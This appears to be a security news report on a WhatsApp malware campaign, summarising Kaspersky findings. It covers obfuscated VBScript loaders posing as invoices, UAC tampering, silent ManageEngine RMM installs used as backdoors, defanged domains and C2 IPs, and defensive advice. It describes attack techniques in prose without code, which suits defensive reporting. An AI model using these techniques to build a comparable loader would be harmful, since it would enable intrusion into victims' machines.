WhatsApp Campaign Spreads RMM Backdoors via VBScript Files

A malware campaign distributing remote access tools through WhatsApp has infected victims across 11 countries, with Kaspersky researchers tracing infections from Malaysia to Brazil to Vietnam. The attackers use heavily obfuscated VBScript files disguised as financial documents to install legitimate remote monitoring software that provides persistent backdoor access.

The campaign targets individual consumers rather than specific organizations, spreading through compromised WhatsApp accounts that send malicious files to contact lists. Malaysia accounts for approximately 80% of observed infections. This social engineering approach—abusing trust in known contacts—follows patterns documented in our social engineering guide.

Attack Chain

Victims receive VBScript attachments via WhatsApp direct messages from contacts whose accounts were previously compromised. The files use deceptive names suggesting invoices, receipts, or business documents—the kind of content users might expect to receive and open without suspicion.

When executed through Windows Script Host, the infection proceeds in three stages:

Stage 1: The initial script creates hidden working directories under C:\Users\Public\Documents\ and downloads additional payloads. The malware employs multiple download mechanisms including curl, bitsadmin, certutil, and PowerShell to evade detection and ensure successful retrieval.

Stage 2: Secondary VBScripts execute in sequence. The first modifies Windows UAC registry settings to eliminate consent prompts for future actions. The second downloads and extracts a ZIP archive containing the deployment packages.

Stage 3: A legitimate ManageEngine Endpoint Central RMM agent installs silently via msiexec.exe. The preconfigured deployment package contains everything needed for remote system access—installer, configuration files, certificates, and silent installation scripts.

This technique of weaponizing legitimate remote administration tools mirrors other campaigns we've covered where attackers abuse trusted software to maintain access while evading security tools that might flag custom malware.

Heavy Obfuscation

The VBScript samples employ aggressive obfuscation to complicate analysis. Techniques include string concatenation that reassembles commands character by character, randomized variable names, and substantial junk code mixed with functional operations. Some variants layer obfuscation so heavily that researchers noted they "employ even heavier obfuscation than other samples."

Files are configured with hidden and system attributes to reduce visibility in file explorers. The scripts also implement download fallback logic, attempting multiple methods to retrieve payloads until one succeeds.

Infrastructure and Attribution

Kaspersky identified several malicious domains hosting payloads:

• temu.baskwms[.]top
• invoice.msopsa[.]top
• qse.shoppes[.]help

Command-and-control infrastructure includes IP addresses 202.61.160[.]201, 202.61.160[.]202, and 38.55.151[.]63. The latter IP was previously associated with ValleyRAT and Gh0st RAT campaigns attributed to Chinese-speaking threat actors.

Simplified Chinese comments embedded in multiple VBScript variants suggest a Chinese-speaking developer. However, researchers assessed the attribution with "low confidence" since infrastructure overlaps remain insufficient for definitive conclusions. The techniques mirror those used by cryptocurrency theft operations that also rely on script-based loaders and RMM tool abuse.

Geographic Distribution

Infections span multiple continents:

• Malaysia: ~80%
• Brazil, India, Mexico
• Singapore, UK, Spain
• Taiwan, Australia, Russia, Vietnam

The heavy Malaysia concentration could reflect initial seeding through compromised accounts in that region, language-specific targeting, or simply the geographic location where researchers first detected the campaign.

Why RMM Tools?

Attackers increasingly favor legitimate remote monitoring and management software over custom backdoors for several reasons. RMM tools come with signed binaries that antivirus products trust. They're designed for persistent access with auto-reconnection and remote shell capabilities built in. And they blend into enterprise environments where IT teams deploy the same tools legitimately.

ManageEngine Endpoint Central specifically offers software deployment, remote support, and comprehensive system control—everything an attacker needs to maintain persistent access and expand their foothold.

Defensive Recommendations

1. Train users to treat WhatsApp attachments with suspicion, especially unexpected VBScript or executable files
2. Block VBS/VBE execution via Windows Script Host where business requirements allow
3. Monitor RMM tool installations for unexpected ManageEngine Endpoint Central deployments
4. Audit UAC registry settings for unauthorized modifications
5. Block known malicious domains and IPs listed in the Kaspersky report

For organizations, the campaign demonstrates how consumer messaging platforms extend the corporate attack surface. Employees receiving compromised messages on personal WhatsApp accounts may forward malicious files to corporate systems, particularly in BYOD environments.

Users who believe they may have executed suspicious VBScript files should check for unexpected ManageEngine services and review whether UAC consent prompts have been disabled.